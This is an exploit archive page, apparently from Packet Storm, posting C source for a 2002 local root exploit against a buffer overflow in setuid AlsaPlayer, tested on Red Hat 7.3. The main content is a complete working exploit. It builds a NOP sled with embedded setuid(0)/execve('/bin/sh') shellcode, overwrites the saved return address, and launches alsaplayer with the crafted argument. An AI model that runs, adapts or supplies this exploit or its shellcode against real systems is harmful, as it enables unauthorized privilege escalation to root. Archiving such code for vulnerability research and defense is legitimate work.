exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

alsaplayer-suid.c

alsaplayer-suid.c
Posted Sep 23, 2002
Authored by Zillion, Kevin Finisterre

AlsaPlayer contains a buffer overflow that can be used for privileges elevation when this program is setuid. Tested on Red Hat 7.3 linux with alsaplayer-devel-0.99.71-1 . The overflow has been fixed in AlsaPlayer 0.99.71.

tags | exploit, overflow
systems | linux, redhat
SHA-256 | 2875baab452b93c7ef7d5f24fbb1d46a9fa65f879a5d43f51352eee63870a710
Download | Favorite | View

alsaplayer-suid.c

Change Mirror Download
/* 
 * Alsaplayer exploit for a buffer overflow found by KF (snosoft.com) 
 * 
 * This program is not installed with special permissions by default. 
 * However, the author himself does recommend to do so under certain 
 * conditions:
 *
 * https://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000657.html
 *
 * Author: zillion[at]safemode.org (09/2002)
 *
 * Tested on Red Hat 7.3 linux with alsaplayer-devel-0.99.71-1
 *
 */

#include <unistd.h>
#include <sys/stat.h>
#include <string.h>

#define BUFFER_SIZE 1056
#define NOP 0x90
#define RET 0xbfffe440 

char shellcode[]=

"\xeb\x26\x5e\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb0\xa4\xcd\x80" 
"\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd5\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68"; 

void print_error(char * burb) { 
  printf(" Error: %s !\n",burb); exit(0); 
}

void usage(char *progname) {
  printf("\n*--- -- -  Alsaplayer b0f exploit - -- ---*\n");
  printf("\nDefault: %s  -f /path/to/alsaplayer",progname);
  printf("\nOption : %s  -o <offset>\n\n",progname);
  exit(0);
}

int main(int argc, char **argv){
  
  char buffer[BUFFER_SIZE];
  char file[30];
  long retaddress;
  int arg,offset=500;
  
  struct stat sbuf;
  
  if(argc < 2) { usage(argv[0]); }
  
  while ((arg = getopt (argc, argv, "f:o:")) != -1){ 
    switch (arg){ 
    case 'f': 
      strncpy(file,optarg,sizeof(file));
      if(stat(argv[2], &sbuf)) { print_error("No such file");}
      break; 
    case 'o':       
      offset = atoi(optarg);
      if(offset < 0) { print_error("Offset must be positive");}
      break; 
    default :       
      usage(argv[0]); 
    } 
  } 
  
  retaddress = (RET - offset);
  memset(buffer,NOP,BUFFER_SIZE);
  memcpy(buffer + BUFFER_SIZE - (sizeof(shellcode) + 8) ,shellcode,sizeof(shellcode) -1);
  
  /* Overwrite EBP and EIP */
  *(long *)&buffer[BUFFER_SIZE - 8]  = retaddress;
  *(long *)&buffer[BUFFER_SIZE - 4]  = retaddress;
  
  if(execl(file,file,"-p",buffer,NULL) != 0) {
    print_error("Could not execute alsaplayer ");
  }
  
  return 0;
  
}
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    65 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close